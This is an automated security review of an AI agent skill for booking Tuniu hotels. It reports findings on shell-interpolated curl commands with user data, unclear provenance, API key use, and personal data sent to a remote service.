v1.0.3

途牛酒店预订技能

ReviewClawScan verdict for this skill. Analyzed May 1, 2026, 5:35 AM.

Analysis

This hotel-booking skill is purpose-aligned, but it should be reviewed because it uses raw shell curl commands with user-entered booking details, an API key, and personal information.

GuidanceReview this skill before installing. It appears designed for legitimate Tuniu hotel booking, but use it only if you trust the publisher and endpoint, keep the API key protected, avoid logging personal information, and ensure any implementation safely encodes user-provided fields instead of inserting them directly into shell commands.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

Abnormal behavior control

Checks for instructions or behavior that redirect the agent, misuse tools, execute unexpected code, cascade across systems, exploit user trust, or continue outside the intended task.

Tool Misuse and Exploitation

SeverityHighConfidenceMediumStatusConcern

SKILL.md

本 skill 通过 **shell exec** 执行 **curl** ... 参数均为占位，调用时需**根据用户当前需求**填入实际值（城市、日期、酒店 ID/名称、入住人、联系方式等）

The skill directs the agent to build and run shell commands containing user-controlled values, including names and contact data, without explicit shell/JSON escaping or a safer structured HTTP tool. A crafted value could alter the request or shell command.

User impactA malicious or malformed hotel name, traveler name, or contact field could cause unintended command behavior or an incorrect booking request.

RecommendationUse a structured HTTP client or pass data as safely encoded JSON rather than interpolating values into a shell string; validate fields and require explicit confirmation before creating orders.

Agentic Supply Chain Vulnerabilities

SeverityInfoConfidenceHighStatusNote

metadata

Source: unknown; Homepage: none

The package provenance is not identified in the provided metadata. For an instruction-only skill that uses an API key and sends booking data externally, users should verify the publisher and endpoint.

User impactUsers have less context for deciding whether this skill is the official or intended Tuniu integration.

RecommendationConfirm the skill publisher and the Tuniu endpoint before installing, and prefer a version with clear source and homepage metadata.

Permission boundary

Checks whether tool use, credentials, dependencies, identity, account access, or inter-agent boundaries are broader than the stated purpose.

Identity and Privilege Abuse

SeverityLowConfidenceHighStatusNote

_meta.json

"TUNIU_API_KEY": { "type": "string", "description": "途牛开放平台 API key，用于 apiKey 请求头", "required": true }

The skill requires a Tuniu API key and uses it as delegated authority for the remote service. This is expected for the integration, but it is still account-level authority.

User impactAnyone or any agent flow with access to this environment variable may be able to make Tuniu hotel API calls under the user's key.

RecommendationUse a least-privileged API key if available, restrict and rotate it regularly, and confirm booking actions before allowing the skill to create orders.

Sensitive data protection

Checks for exposed credentials, poisoned memory or context, unclear communication boundaries, or sensitive data that could leave the user's control.

Insecure Inter-Agent Communication

SeverityLowConfidenceHighStatusNote

SKILL.md

个人信息（联系人姓名、手机号、入住人姓名等）通过 HTTP POST 发送至途牛 MCP 远端服务（`https://openapi.tuniu.cn/mcp/hotel`）

The skill explicitly discloses that booking personal information is sent to an external MCP service. This is purpose-aligned for hotel booking, but the data is sensitive.

User impactTraveler and contact details will leave the local agent environment and be sent to Tuniu's remote service.

RecommendationOnly provide the minimum required personal information, avoid logging PII, and verify Tuniu's privacy and booking terms before submitting an order.